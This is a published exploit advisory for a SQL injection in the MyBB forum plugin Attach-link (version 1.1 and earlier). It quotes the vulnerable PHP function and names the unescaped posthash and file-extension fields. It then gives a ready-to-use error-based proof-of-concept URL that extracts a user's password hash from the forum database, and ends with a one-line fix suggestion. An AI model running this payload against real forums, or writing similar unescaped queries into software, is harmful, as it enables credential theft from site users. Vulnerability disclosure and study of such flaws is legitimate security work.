MyBB Plugin Attach-link <= 1.1 SQL injection

Download | Vote Up (1) | Vote Down (0) 
# Exploit Title: MyBB Plugin Attach-link <= 1.1 SQL injection
# Date: 19/01/2013
# Exploit Author: Kallimero
# Vendor Homepage: http://mods.mybb.com/view/attach-link
# Version: 1.1
# Tested on: Debian



Vulnz
========

The mybb plugin named Attach-link is vulnerable to a sql injection.



---------------[inc/plugins/attachlink.php]---------------
<?php
function do_makeattachment($tpid)
{        
        global $mybb,$db,$tid,$linkattached;
        if(!$linkattached){
                $posthash = $mybb->input['posthash'];
                $path_info = pathinfo($mybb->input['link_attachment_url']);
                
                if($mybb->input['link_attachment_size'])
                        $fsize=intval($mybb->input['link_attachment_size']);
                else
                        $fsize=remote_file_size($mybb->input['link_attachment_url']);
                
                if($mybb->input['link_attachment_name'])
                        $filename=$mybb->input['link_attachment_name'];
                else{
                        $filename=basename($mybb->input['link_attachment_url']);
                        if(strpos($filename,"?")!==FALSE)
                                $filename=substr($filename,0,strpos($filename,"?"));
                        $filename=urldecode($filename);
                }
                $filename=str_replace(array("'",'"','/','\\',':','*','?','<','>','|'),' ',$filename);
                
                $attacharray = array(
                        "pid" => $tpid,
                        "posthash" => $posthash,
                        "uid" => $mybb->user['uid'],
                        "filename" => $filename,
                        "filetype" => $path_info['extension'],
                        "filesize" => $fsize,
                        "attachname" => urlencode($mybb->input['link_attachment_url']),
                        "downloads" => 0,
                        "visible" => 1,
                        "dateuploaded" => TIME_NOW,
                        "atype" => 1
                );

                $aid = $db->insert_query("attachments", $attacharray);
                
                require_once MYBB_ROOT."inc/functions.php";
                update_thread_counters($tid, array("attachmentcount" => "+1"));
                $linkattached=1;
                return $aid;
        }
}
?>
---------------[inc/plugins/attachlink.php]---------------


Two fileds are vulnerables ; $posthash, and $pathinfo['extension'].
The second one isn't that obvious, let's explain ; 
the php function postinfo() splits the filename in some parts. (dirname, filename, extension, basename). Here it get the extension. 
But as there's no verification of the validity of the file (or any filter), we can imagine whatever as an extension. Why not a SQL injection payload ?
(But it's limited cause you can't use the ".").
But I'm a pretty lazy guy, so I'm going to inject in posthash. 


Here is the PoC (error-based):
http://[site]/[path]/newreply.php?tid=1&link_attachment_url=trololo.php&link_attachment_size=1&link_attachment_name=lol&posthash=',(select 1 from (select count(*),concat((SELECT password FROM mybb_users LIMIT 0,1),0x7e, floor(rand(0)*3)) as e from information_schema.tables group by e) a))-- -



How to Fix ?
============


A simple $db->escape_string() on the vulnarable fields would fix it.


Thanks
=========

All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s. 
Please visit : http://hwc-crew.org/

(and as always, thanks for reading :p)

Groucho

Be the first to give feedback !
Please login to comment !